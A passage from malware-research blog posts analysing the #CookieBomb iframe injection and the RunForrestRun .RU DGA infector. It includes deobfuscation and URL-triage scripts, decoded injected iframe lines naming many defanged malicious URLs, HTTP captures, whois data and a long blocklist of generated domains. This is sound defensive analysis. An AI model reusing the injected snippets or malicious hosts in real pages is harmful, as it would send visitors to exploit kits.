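    """Evaluate a chain of integer literals joined by + - * (no parentheses)."""
    terms = re.split(r'\s*([-+])\s*', expr)          # '0xa-02' -> ['0xa', '-', '02']

    def product(t):
        v = 1
        for lit in re.split(r'\s*\*\s*', t):
            v *= js_int(lit)
        return v

    total = product(terms[0])
    for op, t in zip(terms[1::2], terms[2::2]):
        total = total + product(t) if op == '+' else total - product(t)
    return total


def fold_constants(js: str) -> str:
    """Replace constant integer arithmetic and comparisons with their result.
    Deliberately simple: applied to the whole text, string literals included."""
    js = _CHAIN.sub(lambda m: str(_eval_chain(m.group(1))), js)
    js = _LONE.sub(lambda m: str(js_int(m.group(1))), js)

    def cmp(m):
        equal = js_int(m.group(1)) == js_int(m.group(3))
        return 'true' if equal == m.group(2).startswith('=') else 'false'
    return _CMP.sub(cmp, js)


# --- strings: "ab" + "cd" -> "abcd", then "\x62" -> "b" ---
_JOIN = re.compile(r'''(["'])((?:(?!\1)[^\\\n]|\\.)*)\1\s*\+\s*\1((?:(?!\1)[^\\\n]|\\.)*)\1''')
_HEXCHAR = re.compile(r'(?<!\\)\\x([0-9A-Fa-f]{2})')


def join_strings(js: str) -> str:
    """Merge adjacent same-quote literals joined with +, until nothing changes."""
    prev = None
    while prev != js:
        prev, js = js, _JOIN.sub(lambda m: m.group(1) + m.group(2) + m.group(3) + m.group(1), js)
    return js


def resolve_hex_chars(js: str) -> str:
    """Turn \\xHH escapes into the printable ASCII character they stand for."""
    def sub(m):
        c = chr(int(m.group(1), 16))
        return c if 0x20 <= ord(c) < 0x7f and c not in '"\'\\' else m.group(0)
    return _HEXCHAR.sub(sub, js)


def normalize(src: str) -> str:
    """Undo all three tricks so a standard JS decoder can take over."""
    js = unwrap_php_echo(src)
    js = fold_constants(js)
    js = join_strings(js)
    return resolve_hex_chars(js)


# Constructed sample combining the three tricks; NOT the real injected code.
SAMPLE = r'''<?php echo "<script>var a=\"\\x62\"+\"v\";if(0x19==031){var bv=0xa-02;}</script>"; ?>'''

if __name__ == '__main__':
    print(normalize(SAMPLE))
    # -> <script>var a="bv";if(true){var bv=8;}</script>
```

Run it on the saved page source and feed the output to the decoder of your choice; only the wrapper and the constant tricks are removed, the actual #CookieBomb logic is left for the decoder to evaluate.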

Below is the decoding result:

#MalwareMustDie!

What is behind #CookieBomb attack? (by @malm0u53)

You know me as @malm0u53, crusade member of MalwareMustDie. In this investigation report I will write about what the #CookieBomb code injection attack can actually do to damage and infect our systems.

I saw the wide-spread code injection infection reported here, and decided to help the investigation:

As you may see in my tweets, I was struggling with the recently reported infection. I came to a conclusion about what to grep in order to follow and mitigate this attack further, which ended up as the list of functions and their IFRAME redirections below:
" function zzzfff() { mdi.src = 'hxxp://kirtec.de/asvz/Mgf4RNhq.php';
" function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
" function zzzfff() { e.src = 'hxxp://onewaypr.my-ehost.com/products/YFb48ymx.php';
" function zzzfff() { y.src = 'hxxp://yogyavilla.com/Map_Chinese_files/dtd.php';
" function zzzfff() { ywbc.src ='hxxp://htm.co.za/js/clicker.php';
" function zzzfff() { kaizc.src ='hxxp://press2.blogolize.com/cnt.php';
" function zzzfff() { yk.src = 'hxxp://gidropark.net/traf.php';
" function zzzfff() { rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
" function zzzfff() { e.src = 'hxxp://www.viagemanimais.com.br/2R83bpTL.php';
" function zzzfff() { gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
" function zzzfff() { gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
" function zzzfff() { c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';"
" function zzzfff() { csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
" function zzzfff() { nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
" function zzzfff() { ax.src = 'hxxp://portofmiamicruiseparking.com/log/dtd.php';
" function zzzfff() { orih.src = 'hxxp://smartsecurit.cz/clik.php';
" function zzzfff() { i.src = 'hxxp://hauser-consulting.com/relay.php';
" function zzzfff() { pndb.src = 'hxxp://rocklandaerospace.com/edi/x46kpMKR.php';
" function zzzfff() { iwuu.src = 'hxxp://www.mai-ban.com/clik.php';
" function zzzfff() { p.src = 'hxxp://koliba.xercom.cz/yjW7x3V8.php';
" function zzzfff() { chyo.src = 'hxxp://dv-suedpfalz.de/melde/dtd.php';
" function zzzfff() { iin.src = 'hxxp://casino.kuti-komi.com/traf.php';
" function zzzfff() { di.src = 'hxxp://web134.sv01.net-housting.de/dtd.php';
" function zzzfff() { gir.src = 'hxxp://www.teutorace2012.de/components/mjBr9dbV.php';
" function zzzfff() { obgn.src = 'hxxp://www.talkingtojesus.com/Backups/QLMyqwF9.php';
" function zzzfff() { qvhb.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { s.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { ucr.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { vpbo.src = 'hxxp://inntech.org.ru/counter.php'
" function showkod(){ js_kod.src = 'hxxp://airbrush-design.cz/images/nGMcmjkK.php';
[...]

Wow. Many links to follow.. So I made a breakdown check of each PHP infector, released in pastebin: http://pastebin.com/raw.php?i=0cGUGk8X

The significant results are summarized below:

One of the links:

" function zzzfff() {
ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
redirect >> hxxp://kastenbafortschrittliche.jaimestexmex.com:801/untrue-doing-edge_ago.htm
which goes straight to the exploit kit landing page I mentioned here

Another link goes straight to a fake 500 Internal Server Error:

function zzzfff() {
rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
" >> 500 Internal Server Error
// header..
HTTP/1.1 500 Internal Server Error
Date: Mon, 22 Jul 2013 18:05:49 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5
mod_auth_passthrough/2.1 mod_bwlimited/1.4
FrontPage/5.0.2.2635
Content-Length: 704
Connection: close
Content-Type: text/html; charset=iso-8859-1
Verdict of the malicious URL above is here

One of the links redirects to localhost; strange for a good link, isn't it?

" function zzzfff() {
gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
HTTP/1.1 302 Found

Date: Mon, 22 Jul 2013 18:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm3
Location: http://localhost/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

One link leads through a permanent redirection to the Exploit Kit landing page; that IP is a Plesk panel user:

" function zzzfff() {
gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
" HTTP/1.1 301 Moved Permanently

Date: Mon, 22 Jul 2013 18:16:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.intrologic.nl/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: hxxp://www.intrologic.nl/Mn84DfXb.php
X-Powered-By: PleskLin
↑Verdict: [1] and [2]

One link:

" function zzzfff() {
c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';" >
Redirects users to:  hxxp://www.schwarzeraben.de/rel.php
Loads malware from:
fgnfdfthrv.bee.pl
alolipololi.osa.pl
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru
↑This attack uses the .htaccess file to redirect users to a sites serving malware. Verdict: [1] http://labs.sucuri.net/db/malware/malware-entry-mwhta7 [3]
The MMD tool for domain checks shows the result of:
fgnfdfthrv.bee.pl,127.0.0.1,
alolipololi.osa.pl,74.125.236.80,
gberbhjerfds.osa.pl,127.0.0.1,
zxsoftpromo.ru,,
centralfederation.ru,,
chimeboom.ru,,
faqaboutme.ru,,
lkjoiban.ru,,
longqwality.ru,,
zxsoftpromo.ru,,
which means (WARNING!) the alolipololi.osa.pl domain is currently active for infection,
fgnfdfthrv.bee.pl and gberbhjerfds.osa.pl are currently blacklisted (they resolve to 127.0.0.1), and the other .RU domains are inactive.

The links below went straight to blacklisted sites:

" function zzzfff() {
csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 18:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html
↑Verdict: [1][2]

And..

" function zzzfff() {
nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
"
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 19:03:40 GMT
Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8j
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Verdict: [1][2]

There are many other similar results in the pastebin I reported here.
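The grep list above and the per-URL header checks that follow it are easy to automate. The script below is an added example written for this report, not the tooling @malm0u53 used: it pulls every `x.src = 'hxxp://…'` IFRAME target out of decoded #CookieBomb code, refangs it, and buckets each stage-2 URL by the raw HTTP response head it returned, using the same distinctions the hand triage above makes (302 to localhost, 301 to the same host with a www. prefix, a 5xx error page, plain 200 content). The decoded lines and the header blocks used as fixtures are the ones quoted on this page, trimmed; no new URLs are introduced.

```python
import re
from urllib.parse import urlsplit

# `function name() { elem.src = 'hxxp://…'` as listed in the decoded code above
_SRC = re.compile(r"function\s+(\w+)\s*\(\)\s*\{\s*(\w+)\.src\s*=\s*'(hxxps?://[^']+)'")


def refang(url: str) -> str:
    """hxxp:// -> http:// (the defanging used in the post)."""
    return re.sub(r'^hxxp', 'http', url)


def extract_targets(decoded_js: str):
    """(function name, element variable, refanged URL) for each IFRAME target."""
    return [(fn, el, refang(u)) for fn, el, u in _SRC.findall(decoded_js)]


def unique_hosts(targets):
    return sorted({urlsplit(u).hostname for _, _, u in targets})


def parse_response(raw: str):
    """Status code and lower-cased header dict from a raw HTTP response head."""
    lines = [l for l in raw.strip().splitlines() if l.strip()]
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        if ':' in line:
            k, v = line.split(':', 1)
            headers[k.strip().lower()] = v.strip()
    return status, headers


def _bare(host):
    """Strip a leading www. so intrologic.nl and www.intrologic.nl compare equal."""
    host = host or ''
    return host[4:] if host.startswith('www.') else host


def classify(url: str, raw_response: str) -> str:
    """Bucket a stage-2 URL by how it answered, mirroring the hand triage above."""
    status, h = parse_response(raw_response)
    if status in (301, 302, 303, 307, 308):
        dst = urlsplit(h.get('location', '')).hostname or ''
        if dst in ('localhost', '127.0.0.1'):
            return 'redirect-to-localhost'
        if _bare(dst) == _bare(urlsplit(url).hostname):
            return 'same-host-redirect'
        return 'redirect-to:' + dst
    if status >= 500:
        return 'server-error'
    if status == 200:
        return 'served-content'
    return f'http-{status}'


def triage(cases):
    """{url: bucket} for an iterable of (url, raw response head) pairs."""
    return {url: classify(url, raw) for url, raw in cases}


# Fixtures taken from the lines and header blocks quoted in this report
DECODED_SNIPPET = """
" function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
" function zzzfff() { ywbc.src ='hxxp://htm.co.za/js/clicker.php';
" function showkod(){ js_kod.src = 'hxxp://airbrush-design.cz/images/nGMcmjkK.php';
"""
RESP_LOCALHOST = """HTTP/1.1 302 Found
Date: Mon, 22 Jul 2013 18:14:02 GMT
Server: Apache
Location: http://localhost/
Content-Length: 0
"""
RESP_301 = """HTTP/1.1 301 Moved Permanently
Server: Apache/2.2.3 (CentOS)
Location: hxxp://www.intrologic.nl/Mn84DfXb.php
X-Powered-By: PleskLin
"""
RESP_500 = """HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 704
"""

if __name__ == '__main__':
    for fn, el, url in extract_targets(DECODED_SNIPPET):
        print(fn, el, url)
    for url, bucket in triage([
            ('http://olafknischewski.de/usage/esd.php', RESP_LOCALHOST),
            ('http://intrologic.nl/Mn84DfXb.php', RESP_301),
            ('http://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php', RESP_500)]).items():
        print(bucket, url)
```

The buckets are only a first sort: a "server-error" or "redirect-to-localhost" answer tells you the stage is dormant or geo/UA gated, not that it is clean, which is why the report still submits those URLs for a verdict.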

This investigation is posted to help establish the verdict on the malicious activities caused by the #CookieBomb code injection attack, and for the shutdown of its detected malicious domains. The post is a group effort; thank you to @DarrelRendell and @Secluded_Memory for supporting this case with great advice.

#MalwareMustDie!

The come back of the .RU RunForrestRun's DGA with 365 domains infector (ALIVE!)

I came across an infected site spotted in the Japan network, as per the snapshot below:

It is a site guiding and introducing jobs for women workers, and it is infected with the obfuscated code of RunForrestRun, a DGA .RU domain-based malware infector. We have had experience with this DGA since the day we started MalwareMustDie, so if you search for the RunForrestRun keyword in our blog you'll see many results like this-->>[Google Search Result].

Having successfully shut down and stopped those infection cases in the past, we used the knowledge we gathered to release a public guideline for handling DGA cases, posted on our Google Code here-->>[GoogleCode]

After a while we did not see any activity from this infector, until yesterday, when we accidentally saw the same infector once more. We posted the findings and how to decode it in our twitter announcement here:

The obfuscation code

There are some changes in the infector we spotted now: practically, the randomization logic is slightly improved, and the double obfuscation uses a "Blackhole"-style JavaScript encoding. The obfuscation itself was encoded in two layers; we saw similar encoding styles on infected sites leading to the Blackhole or Cool Exploit Kit, suggesting a correlation between those cases (i.e. they purchased the same encoding service). The decoding steps can be viewed in our pastebin here-->>[PASTEBIN]

Looking at the front encoding method, the one we saw injected in the hacked site, it has the structure below:

You can see the typical tag used for the encoded part (red), wrapped within the script tag (purple), and JavaScript's String.fromCharCode method used to decode the long obfuscated data between those tags.

Just run the above code in any JS simulator and we get the real obfuscation code. The hexed code is pasted in the pastebin link mentioned above too. The long obfuscated data is fed into the logic below:

document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? 
..which stores that data into a document object, to be decoded by the generator below:

The red part shows the deobfuscation logic and the purple part shows the "eval" method used to run the decoded value.

Finally we arrive at the final deobfuscated result, which is the core of the "RunForrestRun" infector's domain randomization logic itself. In this version I separated the randomization code into three parts: the seeds, the calculation part, and the formulation logic, as per the breakdown below:

And the result is written as an IFRAME pointing to one of the .RU URLs of the form:

"h00p://" + domainName + ".RU/runforestrun?sid=botnet2"
as the code below states:

The infector domain and current status

Our friend Mr. Darrel Rendell helped to extract the .RU infector domains based on the time input to the random logic, as he tweeted below:

The result is very nicely separated as a function of the dates within a one-year cycle, giving 365 extracted domains, which can be viewed here-->>[PASTEBIN]. Thank you for the help on this.

I just checked which of the extracted domains are currently ALIVE using our beloved tool, which we share here-->>[GoogleCode], and found that the domains below are currently UP & ALIVE:

bumggasfaoywfncc.ru,195.22.26.231,
vvteeuevhpbpepfi.ru,91.233.244.102,
ijxsncuprepwqzlt.ru,91.233.244.102,
knuidyekzkyuhtpi.ru,91.233.244.102,
You can see the check PoC I performed in our paste here-->>[MMD Pastebin]
The other way to check whether these domains are alive is via the root DNS itself: I picked the first domain, traced its records in DNS now, and found it alive:
Tracing to bumggasfaoywfncc.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
|\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
|\___ a.dns.ripn.net [ru] (193.232.128.6)
| |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) Got authoritative answer
| \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) Got authoritative answer
|\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
|\___ b.dns.ripn.net [ru] (194.85.252.62)
| |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
| \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
|\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
|\___ d.dns.ripn.net [ru] (194.190.124.17)
| |\___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
| \___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
|\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
|\___ e.dns.ripn.net [ru] (193.232.142.17)
| |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
| \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
|\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
\___ f.dns.ripn.net [ru] (193.232.156.17)
|\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
\___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
Below are the current URLQuery reports of the four alive .RU infector URLs/domains above, to check the HTTP response; thanks to URLQuery for its "on-the-record" feature:
http://urlquery.net/report.php?id=3952242
http://urlquery.net/report.php?id=3952365
http://urlquery.net/report.php?id=3952414
http://urlquery.net/report.php?id=3952290
The 3 domains above that resolved to the IP 91.233.244.102 are currently active domains, as proven by the whois data below:
domain:        VVTEEUEVHPBPEPFI.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.04.15
paid-till: 2014.04.15
free-date: 2014.05.16
source: TCI
Last updated on 2013.07.24 01:36:36 MSK

domain: IJXSNCUPREPWQZLT.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2013.04.15
paid-till: 2014.04.15
free-date: 2014.05.16
source: TCI
Last updated on 2013.07.24 01:36:36 MSK

domain: KNUIDYEKZKYUHTPI.RU
nserver: dns1.webdrive.ru.
nserver: dns2.webdrive.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created: 2012.11.06
paid-till: 2013.11.06
free-date: 2013.12.07
source: TCI
Last updated on 2013.07.24 01:36:36 MSK
As seen in the data above, the REGGI.RU registrar was somehow tricked/abused into letting these domains onto the internet. Later we learned that the one remaining domain was sinkholed at 195.22.26.231.
We have also learned that abusive registrations at Russian registrars consistently show the status REGISTERED, DELEGATED, UNVERIFIED, just as the active domains above do. This information is very important for following the shutdown process further.

The conclusion

This DGA is ALIVE and harmful. Please block these domains, as they are proven ALIVE.
There is no good use for this DGA, so no further verdict is needed from our side.
Our friend Conrad Longmore of the Dynamoo Blog also suggests that we all block the IP 91.233.244.102, as many malicious activities have been recorded on this IP, per his tweet below:

For the convenience of the dismantling effort, we also paste below the list of domains we decoded from this DGA; sorry for taking so much space in this report:
kxfcnwlyyohascji.ru
wjikjkybqouienfm.ru
jwkynwfxjqdqqmji.ru
vjnhblgryauqcpmr.ru
iwoughjskqxnoury.ru
tirdttcivfplnrds.ru
gwtrhozqbvudulyl.ru
siwafwlsbplqrxly.ru
fvxordgblagqooqx.ru
rhbyvkanoqokqyit.ru
evdmudjenjokhgmz.ru
phgunkwwcglepbdc.ru
cuijmuljysivscwe.ru
oglrzlxpvxfhgihb.ru
bumggasfaoywfncc.ru
ngpormkfmmcfgysb.ru
yrqwbnjqbnfhpbuu.ru
lguktmilemdssbyx.ru
xrvstpmjbtxnttxd.ru
kfzhvfgdfixkfdrr.ru
wqbrmmqhlkusiixa.ru
jfegifyhkbjxfflc.ru
uqfnewvxvyvsrxuk.ru
hejcagnpfrpnqefc.ru
tqkkpnnamkpqnyym.ru
genyzeyokjwxykzm.ru
spphczekzysdypqb.ru
fdsvrfljfaskbylv.ru
qptetotipsmswbqw.ru
ddxrlumbiwovldwg.ru
poyalyqorovwqves.ru
ntppvruxnkdjhvbh.ru
zgsxmhffvnizvxft.ru
mtuloilstrcfoykq.ru
yfxueilamhutmmnr.ru
ksyiaulnbpgnxpjs.ru
wfcsvebxgiynxlbc.ru
jsehchxfgboukksb.ru
vehpowijritygngg.ru
isjdecxytkoiazad.ru
uemmazcuvorvsadb.ru
grnzukxvhqnjfana.ru
sdqirxitzjgxxxhf.ru
frswwkcwyjwmrorb.ru
rdvfkzvdqxpufsep.ru
eqxsyluecdcxpped.ru
qdbewgrvhvwygvlo.ru
cqcrrdgweomwshmp.ru
ocfaopqtguzswofi.ru
bpholidutrkjmtpp.ru
nckwyplkpfqczmxl.ru
znlfqprdgejpllxi.ru
mbosgirfmfoygmhk.ru
xnqbiapjqcpvvcqz.ru
kbtpctegrcuillhc.ru
wmuxxiagzhcieofr.ru
jaymuwnpcjtqcwot.ru
vmzukuabemehxwpw.ru
hzbkqtgarqrmdlcx.ru
qqafbwfwjrflbmdo.ru
deeskswjfulkurjc.ru
ppfbslcowvdivwmr.ru
cejpdwxlftekbrch.ru
npkxjvsffuotzmij.ru
adnmvxwbyzjwvasg.ru
moouumrwtvnetzfu.ru
ybrdscaecknwugpu.ru
lotqnwonxpgigjox.ru
xawyilvvdurtcltc.ru
joynyhkerylsfygl.ru
vzzvoqbscqsnmrqr.ru
indlredwgvungvsq.ru
uyethhnsehcfqilz.ru
hniitysuwprckvzs.ru
syjqyvrpyohlexgj.ru
fmmflppopijsipdr.ru
ryonlorhvoekruec.ru
emrbflbunrcqrjgk.ru
qxsjdyodxeyyechp.ru
dlwxvurpfeyqyqcj.ru
oxxguneutbrhtsjx.ru
blbwpvcyztrepfue.ru
nwcenehdgqyxtssq.ru
zjfndnhwdsrwephi.ru
mwhbjgismatmjuji.ru
yikkpeqinkedjnxs.ru
kvmxjgblbhjgpjvw.ru
wipgnmjxfgwttrlf.ru
jvqtbrrbikxribjl.ru
vhtdynyciknmkblg.ru
tmlrjxvvrvkyxofn.ru
gbogvuamqydsxcgz.ru
smpovxvnxkelrgzt.ru
eatdfntzfgqrprmj.ru
qlulnseexvzpptcm.ru
dzvyrlqebdcolbei.ru
plzhfkuhkocvqwvx.ru
cybxcikisigkmqtl.ru
olegrpgtdxosnnkc.ru
aygtmclwegxsmjid.ru
mkjdkbwuxcnuxtqd.ru
yvklttrmfvygrvwk.ru
lknyzylpjzkasnmo.ru
xvphlknpxewklsyd.ru
kjsvlbwoxhcbtfpq.ru
vvteeuevhpbpepfi.ru
ijxsncuprepwqzlt.ru
uuyavjatmoykgodf.ru
hicqgipogsjulrgn.ru
tudygcklurkthcmt.ru
gihnijebfitftukm.ru
rtivxqoindugifaf.ru
ehmjatkmhnivwxdo.ru
qtnrpbmfuierqstw.ru
dhqgdpbdxrusdxcw.ru
psroiljvwkqrnfqf.ru
bhvdnklorkjcfppd.ru
nswltcjxwwnbrljp.ru
agabgtdhgsbspwsq.ru
mrcjwchanjuilitl.ru
yefscrehgfveysyc.ru
wjvftsujnszcvevs.ru
jwwtixcvymcflhob.ru
vibeglyuxuzbkgbo.ru
hwcrlxhvrevsnzwl.ru
tifbsmujkhbvbkyj.ru
gvhodonxvblrghch.ru
shkwimusoizncvhx.ru
fvllwtyeleporhen.ru
rhotamrrectjqfto.ru
duqhgptpqmsyyrqj.ru
phtqmnbhcmyknyss.ru
cuveztrnrgnshbgp.ru
ogymeohrjxfscgfs.ru
btacsqzlgctcxjei.ru
mgdlwkvcgkygcqck.ru
yretgeoqsvdnikar.ru
lfihodgqdjmfqppt.ru
xrjpymuxzutqaudg.ru
kfnebggkwsjlxzbk.ru
wqomqwbvtwiwejid.ru
ierbdycqkclubnex.ru
uqsiihfbyeotruuc.ru
hewwcxblormskqae.ru
tpxfuxwvnqcmekoi.ru
gdbvudwhpnuwrdls.ru
spdenojggmdrlixc.ru
edgsojssutkqjbxg.ru
qohaffgzdpnksohx.ru
ddloyfnurjprfwnb.ru
pomwopzpscwqxpfv.ru
zfguwvhdmjlutvwo.ru
mtiidqbknpskzasp.ru
xflrjyyjswoatsoq.ru
ksmfflbpefxgfdsv.ru
wepnhoeeodiklyar.ru
jsrcwahdmdarwmto.ru
veukmrlhkghlqqjn.ru
irwxwuybkwltqnhx.ru
tezhfswbxfnnuhbd.ru
grbwyglkgkieiybk.ru
sdefwonjqnujdoxr.ru
fqgtjwvcrkmuhkco.ru
rdjcjrxljzaughvt.ru
eqkplxtjjuhkbeqs.ru
pcoyyxsfhsyysfme.ru
cppmejjneikodxrc.ru
ocsuqiqvvknfvcjp.ru
bpujwsmplvftnqcx.ru
nbxrjalwllvnbmfs.ru
znyzszkdrxgnovuq.ru
lbcpvpxigyferhws.ru
xmexlajhysktwdqe.ru
kahmnunornwrgpgb.ru
wmiudbgrcvapriql.ru
jzkitejvrxgkgpgi.ru
ulnrpbudycxzdlkt.ru
hyoflopkupjioiqq.ru
tlrnhskrgijhwtlj.ru
gytcnulxsxpsqkfn.ru
skwkybckmywhrhbb.ru
dernflilrdxmfnye.ru
ppsvcvrcgkllplyn.ru
bdvkpbuldslsapeb.ru
npxsiiwpxqqiihmo.ru
adbjjkquyyhyqknf.ru
mocrafrewsdjztbj.ru
yafzvancybuwmnno.ru
lohnrnnpvvtxedfl.ru
wakvnkyzkyietkdr.ru
jnlkttkruqsdjqlx.ru
vznrahwzgntmfcqk.ru
inqgvoeohpcsfxmn.ru
uyrorwlibbjeasoq.ru
gmvdnpqbblixlgxj.ru
sywleisrsstsqoic.ru
fmacqvmqafqwmebl.ru
rxbkqfydlnzopqrn.ru
elfxqghdubihhsgd.ru
qxggipnnfmnihkic.ru
clkujrjqvexvbmoi.ru
owldagkyzrkhqnjo.ru
blorcdyiipxcwyxv.ru
nwpykqeizraqthry.ru
zisiiogqigzzqqeq.ru
mvuvchtcxxibeubd.ru
xixftoplsduqqorx.ru
kvzstpqmeoxtcwko.ru
whddmvrxufbkkoew.ru
jveqgnmjxkocqifr.ru
vhhzcvbegxbjsxke.ru
iujniiokeyjbmerc.ru
gacdiuwnhonuulpe.ru
rmdlgyreitjsjkfq.ru
ezfydrexncoidbus.ru
qlihxnncwioxkdls.ru
dyjvewshptsboygd.ru
plmekaayiholtevt.ru
cyosongjihugkjbg.ru
nkrbvqxzfwicmhwb.ru
axtopsbtntqnfdyk.ru
mkwwclogcvgeekws.ru
yvxfekhokspfuwqr.ru
ljbvfrsvcevyfhor.ru
xvcewyydwsmdgaju.ru
jjgshrjdcynohyuk.ru
vuhaojpwxgsxuitu.ru
iiloishkjwvqldlq.ru
uumwyzhctrwdsrdp.ru
hiplksflttfkpsxn.ru
ttqtkmthptxvwiku.ru
fhuidtlqttqxgjvn.ru
rtvqcdpbqxgwnrcn.ru
ehyewyqydfpidbdp.ru
qsbourrdxgxgwepy.ru
dhedppigtpbwrmpc.ru
osflhkaowydftniw.ru
bgjzhlasdrwwnenj.ru
nrkhysgoltauclop.ru
zenquqdskekaudbe.ru
mroeqjdaukskbgua.ru
ydrngsmrdiiyvoiy.ru
krtbityuhlewigfe.ru
jwkpdxqbemsmclal.ru
uinyjmxfqinkxbda.ru
hvpmffxpfnlquqxo.ru
tisubmfvqrgnloxr.ru
gvujhzvjxwptrtdg.ru
shxrsvasoncjnxpn.ru
fuyfrockpfclxccd.ru
qhcplcuugevvyham.ru
dueebwwdllfburag.ru
pghnrmkoeoetfwsm.ru
ctjbmgjudwisgshv.ru
ogmjjmqdhlbyabzg.ru
atnwerhvttvbivra.ru
mfqfrnqllqcrayiw.ru
yrrnrgliojezjctg.ru
lfvcngdbzjrzgyby.ru
xqwkdyjydkggsppd.ru
keabgwmpzqhpmlng.ru
vqcicnuhtwhxmtjd.ru
iefwvulgninlkoxe.ru
upgghggmbusopaxv.ru
hektxucstnbuncix.ru
tplczomvebjmhsgk.ru
gdoqznfilmtulxxv.ru
ropypfmcqjjfdiel.ru
edtmjcvfnfcbweed.ru
qouubrmdxtgnnjvm.ru
dcyjurmfwhgvyoio.ru
pozrtgdmhvhvdscn.ru
ccdifvomwhtynpay.ru
nneplwlvlcojiegm.ru
lsvdxjpwykxxvryd.ru
xfymtpavzblzbknq.ru
ksacasnubklrikdl.ru
wedkgpdcxlrunbmu.ru
jrfyaswntteouafv.ru
veihxoqukuetxqbn.ru
hrkusbnevtmyisab.ru
tdndpphrtyniynvz.ru
gqortbbbsnksxpmm.ru
sdrzgpowhyckaogu.ru
fqtooihtbhwdxskt.ru
rcwwrqssqrrfpgvd.ru
dpxkgybdgttbeyfh.ru
pcbukgjlihpvehyu.ru
cpdjalvpsvfgqtbd.ru
obgrcxuqunmquthx.ru
bpifbqdpzavdjljq.ru
nbloiroucuvotnck.ru
ymmwxgaimxgqtrdv.ru
lapkpatjbkubfxeu.ru
xmqspbcjfttkibbg.ru
kauhrjmdqenmtyvk.ru
wlvpilfxnxpdoujt.ru
jzxdofqtnlusever.ru
ulbnairmbptfscka.ru
hyccqffkdslpbuue.ru
tkfksqvkqdhspdsm.ru
gyhxgveinbdufdnt.ru
skkhxjykeyukyebl.ru
exmubcrfgpaijgzx.ru
opgsgmrejtyazcrf.ru
bdjhtgqhggicwrmy.ru
nolpsdqvivphcoew.ru
zboxoswkbebgarsh.ru
moplknnccyfkesaj.ru
yasuaexybixmvnge.ru
knuidyekzkyuhtpi.ru
wzvqmhzpppziurdl.ru
jnyfopdfycjyfomx.ru
vybofxkqmidtcnhq.ru
imedqfzemirxjqhn.ru
tyflwmgobjignmbd.ru
gmjzqviddrqumknm.ru
sxkiifqgzmsjvxzn.ru
